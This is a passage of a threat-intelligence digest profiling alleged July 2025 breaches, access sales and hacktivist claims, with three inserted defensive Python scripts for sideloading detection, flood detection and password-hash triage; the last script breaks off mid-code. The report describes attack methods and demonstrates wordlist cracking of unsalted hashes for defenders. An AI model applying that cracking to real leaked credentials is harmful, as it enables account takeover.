  • Key TTPs (Lapsus$ context): Lapsus$ uses a variety of attack vectors, including social engineering, MFA fatigue, SIM swapping, and targeting suppliers.27 Once credentials to a privileged employee are gained, they attempt to obtain sensitive data using remote desktop tools, followed by extortion attempts.27 They do not typically use malware or custom tools in breached environments, focusing more on social engineering and stolen credentials.28 The 77GB data leak from ISID suggests a successful credential-based infiltration or exploitation of a significant vulnerability.
  • Source Links:

32. Alleged leak of access credentials to District Municipality and Villa of Yarabamba

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T09:24:16Z
  • Victim: District Municipality and Villa of Yarabamba (Government Administration, Peru)
  • Threat Actor: AndesCrypto
  • Incident Description: The threat actor “AndesCrypto” claims to have leaked free access credentials for the District Municipality and Villa of Yarabamba, a government administration entity in Peru. The public release of access credentials, especially for a municipal government, poses a significant risk. It can enable unauthorized access to sensitive citizen data, disruption of public services, or further compromise of government infrastructure, potentially leading to widespread chaos or data theft.
  • Threat Actor Profile: AndesCrypto
  • No specific information about “AndesCrypto” is available in the provided research material. This suggests that “AndesCrypto” is either a new or less publicly documented individual threat actor. The name “AndesCrypto” suggests a potential connection to South America (Andes region) and cryptocurrency, possibly indicating a financially motivated actor who deals in crypto.
  • Motivations: The “free access” claim could be for notoriety, a demonstration of capability, or a means to attract attention for future financially motivated activities. While the access is offered “free,” the underlying motivation for the breach itself is likely financial, as compromised government access can be later monetized or used as leverage.
  • TTPs: The leak of access credentials implies successful credential harvesting. This could involve phishing campaigns targeting municipal employees, exploitation of weak authentication mechanisms, or brute-force attacks against exposed services. The public release of credentials is a common tactic to prove a breach and gain recognition within the hacking community.
  • Source Links:

33. Alleged data breach of Ivri, Kerner & Co

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T09:10:41Z
  • Victim: Ivri, Kerner & Co, Law Offices (Legal Services, Israel)
  • Threat Actor: Handala Hack
  • Incident Description: The “Handala Hack” group claims to have obtained 345 GB of data from Ivri, Kerner & Co, a law firm in Israel. The compromised data allegedly includes all internal files, legal documents, client communications, and confidential archives. A data breach of a legal services firm is highly sensitive, as it can expose privileged attorney-client communications, confidential case details, and extensive personal and corporate information of clients, leading to severe legal, financial, and reputational repercussions.
  • Threat Actor Profile: Handala Hack
  • “Handala Hack” is a prominent cyber threat group that emerged in late 2023.29 It is an Iranian-linked cyber group, potentially linked to Iran’s Ministry of Intelligence (MOIS), and is known for claiming pro-Palestinian motives.29
  • History & Profile: Handala has been one of the most active threat actor groups targeting Israeli organizations and digital infrastructure since late 2023.29 They gained attention for using Telegram and social media to publicize their operations and taunt victims.29 They claimed a major cyberattack on Israel’s national police network in February 2025, exfiltrating 2.1 terabytes of data.29 In April of the previous year, they claimed to have breached Israel’s radar systems and sent threatening text messages to citizens, and in September they alleged a breach of the Soreq Nuclear Research Center, stealing 197 GB of data and publishing photos.30
  • Motivations: Handala’s motivations are primarily hacktivism and cyber espionage, driven by pro-Palestinian and anti-Israel ideological stances.29 Their strategy blends technical skill with psychological warfare, leveraging mass communications to amplify fear and confusion.29 The targeting of an Israeli law firm, particularly one likely holding sensitive information, aligns with their objective of disrupting and gathering intelligence on Israeli entities.
  • Key TTPs: Handala has evolved from basic phishing and DDoS attacks to credential-based infiltrations, privilege escalation, and long-term persistence within victim environments.29 They utilize cloud storage for data exfiltration (e.g., AWS S3, Storj) and multi-channel command and control techniques.29 They also employ malware (e.g., senvarservice-DC.exe) that blends into normal network traffic to evade detection.29 The large volume of data (345 GB) exfiltrated from the law firm is consistent with their established pattern of large-scale data theft from high-value targets.
  • Source Links:

34. Alleged Sale of DLL Sideloading Crypt

  • Incident Overview:
  • Category: Malware
  • Date: 2025-07-02T08:59:41Z
  • Victim: General users/organizations vulnerable to malware deployment
  • Threat Actor: Detools
  • Incident Description: The threat actor “Detools” claims to be selling a DLL sideloading crypt service. This service is designed to assist in malware deployment by bypassing common security protections. The crypt is advertised as capable of evading Microsoft SmartScreen, Chrome alerts, and Windows Defender. It supports both x64/x86 native and .NET builds and includes a 24-hour detection guarantee, indicating the seller’s confidence in its evasion capabilities. This tool significantly enhances the stealth and effectiveness of malware delivery, making it harder for endpoint security solutions to prevent initial infection.
  • Threat Actor Profile: Detools
  • No specific information about “Detools” is available in the provided research material. This suggests that “Detools” is either a new or less publicly documented individual threat actor specializing in developing and selling malware evasion tools.
  • Motivations: The primary motivation is financial gain through the sale of this specialized malware component. By providing a crypt service that bypasses major security products, “Detools” enables other cybercriminals to deploy their malware more effectively, thereby profiting from the broader cybercrime ecosystem.
  • TTPs: This actor focuses on developing tools that exploit vulnerabilities in how operating systems load dynamic-link libraries (DLLs) and how security software detects malicious payloads. DLL sideloading is a technique where a legitimate application is tricked into loading a malicious DLL instead of a legitimate one. The ability to bypass Microsoft SmartScreen, Chrome alerts, and Windows Defender indicates a high level of technical expertise in anti-detection techniques and a continuous effort to update the crypt to evade new security signatures.
  • Source Links:
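Because a crypter of this kind targets file-reputation and signature checks on the payload, a complementary defensive angle is the DLL sideloading behaviour itself, which shows up in image-load telemetry (for example Sysmon Event ID 7) as a system DLL name resolving from an application or user-writable directory. The following triage heuristic is an added example, not code from the report or from any tool it describes; the event records, paths and DLL list are constructed for illustration.

```python
"""Added example (not part of the report): a triage heuristic for DLL
sideloading, the technique described under TTPs, applied to constructed
image-load events (the kind Sysmon Event ID 7 produces).

Two signals are scored per loaded DLL:
  1. the file name matches a commonly sideloaded Windows system DLL but the
     load path is outside System32/SysWOW64 and the file is not signed by
     Microsoft;
  2. the DLL is unsigned and lives in a user-writable location.
Both together give a high-severity alert, one alone gives medium. The
events and paths below are constructed sample data."""
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                         "c:\\users\\public\\", "c:\\programdata\\")
# DLL names that applications frequently resolve from their own directory and
# that are therefore common sideloading targets (sample list, extend as needed).
KNOWN_SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "userenv.dll",
                     "cryptbase.dll", "dwmapi.dll", "uxtheme.dll", "profapi.dll",
                     "winhttp.dll", "iphlpapi.dll"}
TRUSTED_SIGNERS = {"microsoft windows", "microsoft corporation"}

# Constructed image-load events: loading process, loaded DLL, signature state.
SAMPLE_LOADS = [
    {"process": "C:\\Program Files\\Vendor\\app.exe",
     "image": "C:\\Windows\\System32\\version.dll", "signed": True, "signer": "Microsoft Windows"},
    {"process": "C:\\Program Files\\Vendor\\app.exe",
     "image": "C:\\Program Files\\Vendor\\vendorui.dll", "signed": True, "signer": "Vendor Inc"},
    {"process": "C:\\Program Files\\Vendor\\app.exe",
     "image": "C:\\Program Files\\Vendor\\dbghelp.dll", "signed": True, "signer": "Microsoft Windows"},
    {"process": "C:\\Users\\bob\\AppData\\Local\\Temp\\setup\\app.exe",
     "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\setup\\version.dll", "signed": False, "signer": None},
    {"process": "C:\\Users\\bob\\Downloads\\viewer.exe",
     "image": "C:\\Users\\bob\\Downloads\\helper.dll", "signed": False, "signer": None},
    {"process": "C:\\Program Files\\Vendor\\app.exe",
     "image": "C:\\Program Files\\Vendor\\wtsapi32.dll", "signed": False, "signer": None},
]


def classify_image_load(ev):
    """Return an alert dict for a suspicious load, or None for a benign one."""
    image = ev["image"].lower()          # Windows paths are case-insensitive
    name = ntpath.basename(image)        # ntpath handles backslash paths on any OS
    signed = bool(ev.get("signed"))
    signer = (ev.get("signer") or "").lower()
    trusted_signer = signed and signer in TRUSTED_SIGNERS
    in_system_dir = image.startswith(SYSTEM_DIRS)
    user_writable = any(marker in image for marker in USER_WRITABLE_MARKERS)

    reasons = []
    # A genuine, Microsoft-signed copy of e.g. dbghelp.dll redistributed by a
    # vendor is normal; an unsigned or third-party-signed one under a system
    # DLL's name outside the system directories is the sideloading shape.
    if name in KNOWN_SYSTEM_DLLS and not in_system_dir and not trusted_signer:
        reasons.append("system DLL name loaded outside System32/SysWOW64")
    if not signed and user_writable:
        reasons.append("unsigned DLL loaded from a user-writable path")
    if not reasons:
        return None
    return {"severity": "high" if len(reasons) == 2 else "medium",
            "process": ev["process"], "image": ev["image"], "reasons": reasons}


def scan_image_loads(events):
    """Apply the classifier to a batch of events, keeping only the alerts."""
    return [alert for alert in (classify_image_load(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan_image_loads(SAMPLE_LOADS):
        print(alert["severity"], alert["image"], "|", "; ".join(alert["reasons"]))
```

Expect false positives from unsigned in-house software and vendor-bundled DLL copies; tune with hash and signer allowlists, and weigh the loading process's own signature and location before escalating.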

35. Alleged Sale of Admin Access to Indian WordPress Site

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T08:59:18Z
  • Victim: Unidentified WordPress-based website (India)
  • Threat Actor: blackjack
  • Incident Description: The threat actor “blackjack” claims to be selling administrator access to an Indian WordPress-based website. The listing states that the compromised site includes full admin privileges and the ability to redirect transactions to PhonePe, a popular Indian payment platform. This type of access is highly valuable for financial fraud, enabling the attacker to divert payments from legitimate transactions, inject malicious code, or exfiltrate sensitive user data.
  • Threat Actor Profile: blackjack
  • No specific information about “blackjack” is available in the provided research material. This suggests that “blackjack” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of admin access and the ability to redirect payments to PhonePe clearly indicate that the primary motivation is financial gain. The focus on a payment platform suggests a direct path to monetizing the compromised access.
  • TTPs: Gaining administrator access to a WordPress site typically involves exploiting common WordPress vulnerabilities (e.g., outdated plugins, themes, or core software), brute-forcing weak admin credentials, or using phishing to compromise legitimate accounts. The ability to redirect transactions implies either direct modification of payment gateway settings within the WordPress admin panel or the injection of malicious scripts that alter payment flows.
  • Source Links:

36. Alleged data breach of Intertelecom Ukraine

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T08:25:37Z
  • Victim: Intertelecom Ukraine (Network & Telecommunications, Ukraine)
  • Threat Actor: ClayOxtymus1337
  • Incident Description: The threat actor “ClayOxtymus1337” claims to have breached Intertelecom Ukraine, a network and telecommunications provider. While the specific type of data exfiltrated is not detailed, a breach of a telecommunications company can be highly impactful, potentially exposing subscriber data (PII, call records), network infrastructure details, or enabling service disruption. Such information is valuable for espionage, targeted attacks, or further fraud.
  • Threat Actor Profile: ClayOxtymus1337
  • No specific information about “ClayOxtymus1337” is available in the provided research material. This suggests that “ClayOxtymus1337” is either a new or less publicly documented individual threat actor. The “1337” suffix often indicates a self-proclaimed elite hacker.
  • Motivations: The motivation is likely financial gain, as data breaches are typically monetized through sale on underground markets. However, given the geopolitical context of Ukraine, state-sponsored espionage or disruption cannot be entirely ruled out, even if the actor’s primary public persona is financially driven.
  • TTPs: A breach of a telecommunications provider suggests sophisticated attack methods, potentially involving exploitation of critical infrastructure vulnerabilities, supply chain attacks, or highly targeted social engineering against employees with access to sensitive systems. The scale of the breach would depend on the depth of compromise within Intertelecom’s network.
  • Source Links:

37. Alleged data sale of Truemeds

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T08:25:24Z
  • Victim: Truemeds (Healthcare & Pharmaceuticals, India)
  • Threat Actor: OfficialSalesMan
  • Incident Description: The threat actor “OfficialSalesMan” is selling access to Truemeds’ admin panel and claims to have breached a database containing information on 5.1 million users. The listing specifies that the compromised data includes full customer information and is accessible via a web-based interface. For a healthcare and pharmaceuticals company, this data could include sensitive medical information, prescription history, and extensive personally identifiable information (PII), posing severe risks of identity theft, medical fraud, and targeted scams against a massive user base.
  • Threat Actor Profile: OfficialSalesMan
  • No specific information about “OfficialSalesMan” is available in the provided research material. This suggests that “OfficialSalesMan” is either a new or less publicly documented individual threat actor. The alias “OfficialSalesMan” explicitly indicates a focus on monetizing compromised assets.
  • Motivations: The explicit “sale” of both admin panel access and a large customer database clearly indicates that the primary motivation is financial gain. The high volume of user records (5.1 million) suggests a lucrative target for data brokers and other cybercriminals.
  • TTPs: Gaining admin panel access and breaching a large database typically involves exploiting web application vulnerabilities (e.g., SQL injection, insecure APIs), compromising credentials through phishing or brute-force, or exploiting misconfigurations in the target’s infrastructure. The web-based interface for accessing the data implies a user-friendly system for buyers, streamlining the monetization process.
  • Source Links:

38. Alleged sale of unauthorized access to European payroll software firm

  • Incident Overview:
  • Category: Initial Access
  • Date: 2025-07-02T08:10:58Z
  • Victim: Unidentified European company specializing in payroll and tax software development (Software Development, Europe)
  • Threat Actor: flyatrava
  • Incident Description: A threat actor named “flyatrava” claims to be selling unauthorized access to a European company that develops payroll and tax software. The leaked access reportedly includes domain admin privileges, VPN credentials, and an untouched codebase. This is a highly critical compromise for a software development firm, particularly one dealing with sensitive financial and personal data. Domain admin access grants full control over the company’s IT infrastructure, while access to the codebase could lead to intellectual property theft, supply chain attacks (by injecting malicious code into the software), or deep insights for future exploitation.
  • Threat Actor Profile: flyatrava
  • No specific information about “flyatrava” is available in the provided research material. This suggests that “flyatrava” is either a new or less publicly documented individual threat actor.
  • Motivations: The explicit “sale” of such high-value access (domain admin, VPN, codebase) clearly indicates that the primary motivation is financial gain. This type of access is extremely valuable on underground markets, especially for actors looking to conduct corporate espionage, supply chain attacks, or large-scale data exfiltration.
  • TTPs: Obtaining domain admin privileges, VPN credentials, and access to a codebase implies a sophisticated and deep compromise of the target network. This could involve exploiting critical vulnerabilities in network perimeter devices, successful social engineering campaigns against privileged employees, or the use of advanced persistent threats to establish long-term access and exfiltrate sensitive data. The ability to access an “untouched codebase” suggests a direct compromise of development or source code management systems.
  • Source Links:

39. GARUDA ERROR SYSTEM targets the website of PT Global Multi Sentosa

  • Incident Overview:
  • Category: Defacement
  • Date: 2025-07-02T08:07:12Z
  • Victim: PT Global Multi Sentosa (International Trade & Development, Indonesia)
  • Threat Actor: GARUDA ERROR SYSTEM
  • Incident Description: The “GARUDA ERROR SYSTEM” group claims to have defaced the website of PT Global Multi Sentosa, an international trade and development company in Indonesia. A mirror link to the defaced page was provided. Website defacement is a common hacktivist tactic used to publicly announce a breach, convey a message, or simply demonstrate their capabilities.
  • Threat Actor Profile: GARUDA ERROR SYSTEM (Likely Hacktivist of Garuda)
  • “GARUDA ERROR SYSTEM” is highly likely an alias or closely affiliated with the Indonesian hacktivist group “Hacktivist of Garuda”.17
  • History & Profile: “Hacktivist of Garuda” is an Indonesian hacktivist group that created a Telegram channel to announce cyberattacks targeting Indian entities, explicitly stating their attacks were a counterattack in retaliation for attacks by Indian hackers.17 They have previously claimed data theft from Indian railways and multiple Indian educational institutions.
  • Motivations: The primary motivation for “GARUDA ERROR SYSTEM” is hacktivism and retaliation within an ongoing cyber conflict between Indonesian and Indian hacktivist groups.17 While their primary targets are Indian, defacing an Indonesian company’s website could be a false flag operation, a demonstration of capability for potential clients, or a message related to internal Indonesian affairs.
  • Key TTPs: Their activities include data theft and defacement of websites.17 The defacement of PT Global Multi Sentosa’s website is consistent with their known tactics.
  • Source Links:

40. Alleged sale of a press 1 bot

  • Incident Overview:
  • Category: Alert
  • Date: 2025-07-02T07:26:34Z
  • Victim: Users of Coinbase, Kraken, Gemini, and other crypto platforms (USA)
  • Threat Actor: min0r
  • Incident Description: The threat actor “min0r” is reportedly running a “Press 1 (P1) bot” all week, specifically targeting users of major cryptocurrency platforms such as Coinbase, Kraken, and Gemini. The bot uses custom scripts and spoofed calls for vishing (voice phishing) attacks. This tool automates sophisticated social engineering, enabling attackers to trick victims into revealing sensitive information (e.g., login credentials, MFA codes) or performing actions that compromise their crypto accounts, posing a direct threat to cryptocurrency holders.
  • Threat Actor Profile: min0r
  • No specific information about “min0r” is available in the provided research material. This suggests that “min0r” is either a new or less publicly documented individual threat actor specializing in developing and operating vishing tools.
  • Motivations: The explicit “sale” of a P1 bot indicates that the primary motivation is financial gain, by providing a tool that enables other cybercriminals to conduct large-scale vishing attacks for cryptocurrency theft.
  • TTPs: This actor specializes in developing and operating automated vishing tools. The “Press 1 bot” leverages spoofed calls and custom scripts to simulate legitimate interactions, tricking victims into engaging with the automated system. This technique is highly effective at bypassing traditional email or SMS-based phishing defenses, as it directly exploits human trust and urgency over the phone. The targeting of cryptocurrency users suggests a focus on high-value financial targets.
  • Source Links:

41. Alleged data breach of Directorate of Immigration Administration

  • Incident Overview:
  • Category: Data Breach
  • Date: 2025-07-02T06:19:42Z
  • Victim: Turkish Directorate General of Migration Management (YÖKİM) (Government Administration, Turkey)
  • Threat Actor: Turk_data
  • Incident Description: The threat actor “Turk_data” claims to be selling a database allegedly stolen from the Turkish Directorate General of Migration Management (YÖKİM). The leak reportedly includes personally identifiable information (PII) such as Foreigner IDs, full names, birth dates, places of birth, spouse and parent names, and full residential addresses of migrants who entered Turkey between 2018 and 2024. This is a highly sensitive breach of government data, with severe implications for the privacy and security of a large number of individuals, potentially enabling identity fraud, targeted harassment, or other forms of exploitation.
  • Threat Actor Profile: Turk_data
  • The alias “Turk_data” directly suggests a focus on Turkish data. While specific details about “Turk_data” as a distinct threat actor are limited in the provided snippets, the term “TURK data” appears in contexts related to FBI time and attendance systems, and discussions about data quality and reciprocity among cybercriminals.31 These references do not directly profile “Turk_data” as a hacking group but indicate the sensitivity and potential misuse of such data.
  • Motivations: The explicit “sale” of the database clearly indicates that the primary motivation is financial gain. The highly sensitive nature of migration data, which includes extensive PII, makes it extremely valuable on underground markets for various illicit purposes.
  • TTPs: The successful breach of a government entity like the Directorate General of Migration Management suggests sophisticated attack methods. These could include exploiting vulnerabilities in government systems, targeted social engineering campaigns against employees, or the use of malware to exfiltrate large volumes of sensitive data. The specific timeframe (2018-2024) indicates a persistent or recent compromise that allowed for the collection of a comprehensive dataset.
  • Source Links:

42. Alleged data leak of Businessmen in Romania

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T06:09:43Z
  • Victim: Business professionals in Romania (Romania)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to have 40,000 data records of business professionals in Romania. The compromised data reportedly consists of names, roles, and email addresses. This type of business contact data is highly valuable for targeted phishing campaigns, business email compromise (BEC) scams, and other forms of corporate fraud, enabling attackers to impersonate legitimate contacts or launch highly personalized attacks.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. This suggests that “stepbro” is either a new or less publicly documented individual threat actor. However, “stepbro” is associated with multiple data leak incidents in this report (Incidents 42, 43, 44, 45, 46), indicating a prolific data broker or an actor specializing in large-scale data acquisition and sale.
  • Motivations: The explicit “sale” of data in this and other incidents clearly indicates that the primary motivation is financial gain. The actor appears to specialize in acquiring and monetizing various types of bulk data.
  • TTPs: While specific TTPs are unknown, the acquisition of 40,000 business records suggests either a breach of a business directory, a professional networking platform, or a large-scale data scraping operation. The consistent volume of data across multiple “stepbro” incidents points to automated or highly efficient data collection methods.
  • Source Links:

43. Keymous+ claims to have targeted multiple websites

  • Incident Overview:
  • Category: Alert
  • Date: 2025-07-02T05:47:14Z
  • Victim: Microsoft, Roblox, Netflix, Bank of America, Xbox, Dead by Daylight, Rainbow Six, Ubisoft, Forza, Threads, Sea of Thieves, World War Z, Hulu, Steam (USA – Software Development, Gaming, Financial Services, Social Media, Entertainment)
  • Threat Actor: Keymous+
  • Incident Description: The “Keymous+” group claims responsibility for cyberattacks targeting major platforms including Microsoft, Roblox, Netflix, and Bank of America, stating they were recently active against these platforms. The post also notes observed outages across services like Xbox, Dead by Daylight, Rainbow Six, Ubisoft, Forza, Threads, Sea of Thieves, World War Z, Hulu, and Steam, but explicitly denies involvement in attacks on those specific platforms. This public claim, while partially disclaiming responsibility for some outages, serves to assert their presence and impact on high-profile targets.
  • Threat Actor Profile: Keymous+
  • “Keymous+” is identified as a pro-Iranian hacktivist group.35 This group is part of a broader trend of hacktivism in the Middle East, where groups frequently engage in cyber warfare as a form of activism.35 “Keymous+” is also listed among the top hacktivist groups by U.S. cybersecurity agencies, along with Mr Hamza, Mysterious Team, and GARUDA_ERROR_SYSTEM.36
  • History & Profile: “Keymous+” and similar hacktivist crews have been recorded conducting attacks against U.S. Air Force domains, major aerospace and defense companies, and financial institutions, particularly in the aftermath of Iranian nuclear site bombings in June.35 There is a trend of smaller hacktivist groups coming together to form larger entities like the Cyber Islamic Resistance or United Cyber Front for Palestine and Iran.35
  • Motivations: The primary motivation for “Keymous+” appears to be hacktivism and ideological alignment, particularly in support of pro-Iranian, anti-U.S., and anti-Saudi messaging.35 Their activities are characterized as strategic, ideological, and psychological operations aimed at disrupting public trust and signaling technical superiority, rather than solely financial gain.35 The targeting of major U.S. technology and financial entities aligns with these geopolitical and ideological objectives.
  • Key TTPs: Specific TTPs for this incident are not detailed, but the group's past activity consists mainly of Distributed Denial-of-Service (DDoS) attacks.35 Like the other hacktivist groups named alongside it, it tends to go after targets of opportunity: internet-exposed systems running unpatched or outdated software with known Common Vulnerabilities and Exposures (CVEs), and accounts or devices still protected by default or common passwords.36 Its public claims on Telegram serve as a form of information operation that amplifies the perceived impact; an outage listed in such a post is not by itself evidence that the group caused it.35
  • Source Links:
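
The claims above are about outages, and the technique the group is known for is volumetric or layer-7 flooding. The script below is an added example for this report, not code from the group, the victims, or the cited sources: it reads web access logs, buckets requests per second, and flags seconds whose rate exceeds a multiple of the site's baseline, distinguishing a burst spread over many source addresses from one coming from a single address, since per-IP rate limiting handles only the latter. The log lines are constructed, and the baseline rate, spike factor and source-count cut-off are assumptions to be tuned per site.

```python
"""Request-rate spike detection over web access logs, a first check for the
layer-7 flooding that hacktivist crews typically claim.

Added example for this report: not code from the group, the victims, or the
cited sources. The log lines are constructed, and the baseline rate, spike
factor and source-count cut-off are assumptions to tune per site.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache/nginx combined log format (only the fields used here are captured).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(line):
    """Return (timestamp, source_ip, request_line) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return datetime.strptime(m.group("ts"), TS_FMT), m.group("ip"), m.group("req")


def rate_buckets(lines):
    """Requests per second and the set of distinct source IPs per second."""
    counts = Counter()
    sources = defaultdict(set)
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, ip, _ = parsed
        counts[ts] += 1
        sources[ts].add(ip)
    return counts, sources


def find_floods(lines, baseline_rps, spike_factor=5, min_sources=3):
    """Seconds whose request count exceeds spike_factor * baseline_rps.

    Each hit is (iso_second, requests, distinct_sources, kind). A spike spread
    across at least min_sources addresses is tagged "distributed"; one that
    comes from fewer addresses is "single-source". The distinction matters
    because per-IP rate limiting stops the second kind and does nothing
    against the first.
    """
    counts, sources = rate_buckets(lines)
    threshold = baseline_rps * spike_factor
    hits = []
    for sec in sorted(counts):
        if counts[sec] > threshold:
            kind = "distributed" if len(sources[sec]) >= min_sources else "single-source"
            hits.append((sec.isoformat(), counts[sec], len(sources[sec]), kind))
    return hits


def sample_log():
    """Constructed traffic: three quiet seconds, one distributed burst from 20
    addresses, then one burst from a single address. Not real traffic."""
    def entry(ip, second):
        return (f'{ip} - - [02/Jul/2025:05:40:{second:02d} +0000] '
                f'"GET /login HTTP/1.1" 200 512')
    lines = []
    for s in range(3):                                              # 2 req/s baseline
        lines += [entry("203.0.113.5", s), entry("198.51.100.9", s)]
    lines += [entry(f"192.0.2.{i}", 3) for i in range(1, 21)] * 2   # 40 req, 20 IPs
    lines += [entry("203.0.113.77", 4)] * 30                        # 30 req, 1 IP
    return lines


if __name__ == "__main__":
    for hit in find_floods(sample_log(), baseline_rps=2):
        print(hit)
```

On real logs the baseline should come from a quiet reference window rather than a constant, and the per-second buckets should be widened to a sliding window so that a flood with jittered timing does not slip under a one-second threshold.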

44. Alleged sale of 272K Farmers data in Uganda

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:45:02Z
  • Victim: Farmers in Uganda (Agriculture & Farming, Uganda)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to be selling data pertaining to 272,000 farmers in Uganda. While the specific data fields are not detailed, such a large dataset of individuals involved in agriculture could be used for targeted scams, social engineering attacks, or other forms of fraud, particularly in regions where digital literacy might be lower.
  • Threat Actor Profile: stepbro
  • No information about “stepbro” is available in the provided research material beyond the actor's own listings in this report, which suggests a new or less publicly documented individual. As noted in Incident 42, the number and spread of those listings point to a data broker who acquires and resells large datasets across sectors and geographies.
  • Motivations: The explicit “sale” of the data clearly indicates that the primary motivation is financial gain. The actor aims to profit from the unauthorized acquisition and distribution of bulk personal data.
  • TTPs: While specific TTPs are unknown, the acquisition of 272,000 records suggests a large-scale data collection operation. This could involve breaching databases of agricultural organizations, government agencies, or commercial entities that collect farmer data, or it could be the result of extensive data scraping or compilation from various sources.
  • Source Links:

45. Alleged Sale of Portuguese Business Owner Data

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:42:19Z
  • Victim: Portuguese business owners (Portugal)
  • Threat Actor: stepbro
  • Incident Description: A threat actor, “stepbro,” is offering to sell a database allegedly containing information on 55,000 Portuguese business owners. The dataset reportedly includes business names, addresses, phone numbers, email addresses, company websites, and industry classifications. This type of data is highly valuable for business-to-business (B2B) phishing, targeted marketing scams, competitive intelligence gathering, or even corporate espionage.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. As noted in previous incidents, “stepbro” appears to be a prolific data broker specializing in acquiring and selling large datasets from various sectors and geographies.
  • Motivations: The explicit “sale” of the data clearly indicates that the primary motivation is financial gain. The actor aims to profit from the unauthorized acquisition and distribution of bulk business contact information.
  • TTPs: While specific TTPs are unknown, the acquisition of 55,000 business owner records suggests a large-scale data collection operation. This could involve breaching databases of business registries, industry associations, or commercial data providers, or it could be the result of extensive data scraping from public sources. The consistent volume of data across multiple “stepbro” incidents points to automated or highly efficient data collection methods.
  • Source Links:

46. Alleged sale of Worldwide Hotels Info Leads

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:25:35Z
  • Victim: 168,000 hotels worldwide (Hospitality & Tourism)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to be selling a database containing information on 168,000 hotels worldwide. The listing includes detailed hotel lead data such as hotel names, star ratings, addresses, phone numbers, city names, geographic coordinates (latitude and longitude), and in some cases, additional identifiers. Most of the listed hotels appear to be located in Turkey, including well-known regions like Marmaris, Alanya, Antalya, and Istanbul. This data can be valuable for targeted phishing campaigns against hotel staff, reservation fraud, or for competitive intelligence in the hospitality sector.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. As noted in previous incidents, “stepbro” appears to be a prolific data broker specializing in acquiring and selling large datasets from various sectors and geographies.
  • Motivations: The explicit “sale” of the data clearly indicates that the primary motivation is financial gain. The actor aims to profit from the unauthorized acquisition and distribution of bulk business contact information.
  • TTPs: While specific TTPs are unknown, the acquisition of 168,000 hotel records suggests a large-scale data collection operation. This could involve breaching databases of hotel booking platforms, hospitality industry directories, or travel agencies, or it could be the result of extensive data scraping from public sources. The concentration in Turkey might indicate a specific compromise of a Turkish-based service or a targeted scraping effort in that region.
  • Source Links:

47. Alleged data leak of customer database from Hong Kong-based shopping website

  • Incident Overview:
  • Category: Data Leak
  • Date: 2025-07-02T05:15:07Z
  • Victim: Hong Kong-based shopping website (E-commerce & Online Stores, China)
  • Threat Actor: stepbro
  • Incident Description: The threat actor “stepbro” claims to be selling a customer database allegedly extracted from a Hong Kong-based shopping website. The leaked dataset reportedly includes detailed personally identifiable information (PII) such as full names, birthdates, phone numbers, physical addresses, email addresses, hashed passwords, and user login credentials. Additional fields include purchase activity, customer status, and platform usage indicators. This comprehensive PII leak poses a significant risk for identity theft, account takeover, targeted phishing, and various forms of financial fraud against the customers of the e-commerce site.
  • Threat Actor Profile: stepbro
  • No specific information about “stepbro” is available in the provided research material. As noted in previous incidents, “stepbro” appears to be a prolific data broker specializing in acquiring and selling large datasets from various sectors and geographies.
  • Motivations: The explicit “sale” of the customer database clearly indicates that the primary motivation is financial gain. The comprehensive nature of the PII, including hashed passwords and purchase activity, makes this dataset highly valuable for various illicit activities.
  • TTPs: While specific TTPs are unknown, a customer database this detailed is most likely the product of a compromise of the site's backend: exploitation of a web application vulnerability (e.g., SQL injection or an insecure API), compromised administrative credentials, or a misconfigured database or server. The inclusion of hashed passwords shows that the authentication store itself was reached. How much that exposes users depends on the hashing scheme, which the listing does not specify: unsalted MD5 or SHA-1 digests are recovered in bulk with commodity wordlist attacks, whereas properly configured bcrypt, scrypt, or Argon2 hashes materially slow offline cracking. A forced password reset and monitoring for credential stuffing against reused passwords are warranted in either case.
  • Source Links:
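
The first question a responder asks about a dump like the one above is what the "hashed passwords" actually are, because that decides how urgent the user-facing response is. The script below is an added example for this report, not the shop's code or the seller's data: it classifies each record's hashing scheme from the hash format and then runs a wordlist over the bare, unsalted digests only, showing how one pass recovers every weak password at once. The CSV rows and the wordlist are constructed, and reading a bare hex string as an unsalted digest of that width is an assumption that a responder confirms against the application's own code.

```python
"""Triage of the password hashes in a leaked customer dump: classify the
scheme per record and show how quickly bare, unsalted digests fall to a
wordlist, which is what decides the urgency of the user-facing response.

Added example for this report, not the shop's code or the seller's data.
The CSV rows and the wordlist are constructed; treating a bare hex string
as an unsalted digest of that width is an assumption a responder confirms
against the application's own code.
"""
import csv
import hashlib
import io
import re
from collections import Counter

# Self-describing (prefixed) schemes, all salted and deliberately slow.
PREFIXED = [
    (re.compile(r"^\$2[aby]\$\d\d\$[./A-Za-z0-9]{53}$"), "bcrypt"),
    (re.compile(r"^\$argon2(id|i|d)\$"), "argon2"),
    (re.compile(r"^\$6\$"), "sha512crypt"),
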